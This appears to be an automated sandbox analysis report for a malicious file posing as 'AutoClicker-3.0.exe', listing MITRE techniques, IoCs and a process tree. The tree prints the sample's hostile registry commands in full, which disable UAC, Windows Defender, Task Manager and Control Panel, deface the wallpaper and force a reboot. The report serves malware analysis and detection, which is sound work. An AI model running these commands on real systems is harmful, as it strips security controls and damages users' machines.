2e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e

Resubmissions

19-12-2024 11:32

241219-nnswfasnds 8

19-12-2024 11:31

241219-nmrxrasmhy 10

19-12-2024 11:28

241219-nlhbxssqer 5

19-12-2024 11:15

241219-nclyrasmfr 10

Analysis

max time kernel
75s
max time network
80s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-12-2024 11:31

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

AutoClicker-3.0.exe
Size

844KB
MD5

7ecfc8cd7455dd9998f7dad88f2a8a9d
SHA1

1751d9389adb1e7187afa4938a3559e58739dce6
SHA256

2e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e
SHA512

cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d
SSDEEP

12288:GaWzgMg7v3qnCiWErQohh0F49CJ8lnybQg9BFg9UmTRHlM:BaHMv6CGrjBnybQg+mmhG

Score

10^/10

discovery evasion ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
85	raw.githubusercontent.com
86	raw.githubusercontent.com

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/4036-401-0x0000000140000000-0x0000000140126000-memory.dmp	autoit_exe
behavioral1/memory/4036-400-0x0000000140000000-0x0000000140126000-memory.dmp	autoit_exe
behavioral1/memory/4036-421-0x0000000140000000-0x0000000140126000-memory.dmp	autoit_exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "c:\\die.bmp"	reg.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/592-365-0x0000000000400000-0x000000000079B000-memory.dmp	upx
behavioral1/memory/592-394-0x0000000000400000-0x000000000079B000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DeathInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AutoClicker-3.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
5056	reg.exe
4448	reg.exe
3768	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1072	msedge.exe
1072	msedge.exe
1472	msedge.exe
1472	msedge.exe
3316	identity_helper.exe
3316	identity_helper.exe
1696	msedge.exe
1696	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

pid	Process
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1780	shutdown.exe
Token: SeRemoteShutdownPrivilege	1780	shutdown.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe
1472	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2724	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1472 wrote to memory of 4968	1472	msedge.exe	84
PID 1472 wrote to memory of 4968	1472	msedge.exe	84
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 5020	1472	msedge.exe	85
PID 1472 wrote to memory of 1072	1472	msedge.exe	86
PID 1472 wrote to memory of 1072	1472	msedge.exe	86
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87
PID 1472 wrote to memory of 3004	1472	msedge.exe	87

C:\Users\Admin\AppData\Local\Temp\AutoClicker-3.0.exe
"C:\Users\Admin\AppData\Local\Temp\AutoClicker-3.0.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff866a046f8,0x7ff866a04708,0x7ff866a04718
  2⤵
  PID:4968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
  2⤵
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:3764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:4092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
  2⤵
  PID:2112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
  2⤵
  PID:2300
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 /prefetch:8
  2⤵
  PID:3200
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
  2⤵
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
  2⤵
  PID:1308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
  2⤵
  PID:3112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
  2⤵
  PID:332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
  2⤵
  PID:2580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:3740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
  2⤵
  PID:4420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5372 /prefetch:8
  2⤵
  PID:3624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
  2⤵
  PID:4436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2160,17040580404337328537,14447015558801632653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1696

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3220

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2708

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2660

C:\Users\Admin\AppData\Local\Temp\Temp1_DeathInstaller.zip\mover.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_DeathInstaller.zip\mover.exe"
1⤵
PID:4036

C:\Users\Admin\AppData\Local\Temp\Temp1_DeathInstaller.zip\DeathInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_DeathInstaller.zip\DeathInstaller.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\99E9.tmp\DeathInstaller.cmd" "
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1476
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\99E9.tmp\6.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4004
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "c:\die.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    PID:4372
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:448
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5056
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3404
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:3768
- - C:\Windows\SysWOW64\net.exe
    net user Admin /fullname:"GO TO SLEEP!!!"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1348
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /fullname:"GO TO SLEEP!!!"
      4⤵
      System Location Discovery: System Language Discovery
      PID:724
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:64
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 6 /c "MWAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1780

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa394c855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
36988ca14952e1848e81a959880ea217

SHA1
a0482ef725657760502c2d1a5abe0bb37aebaadb

SHA256
d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

SHA512
d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

Download Submit
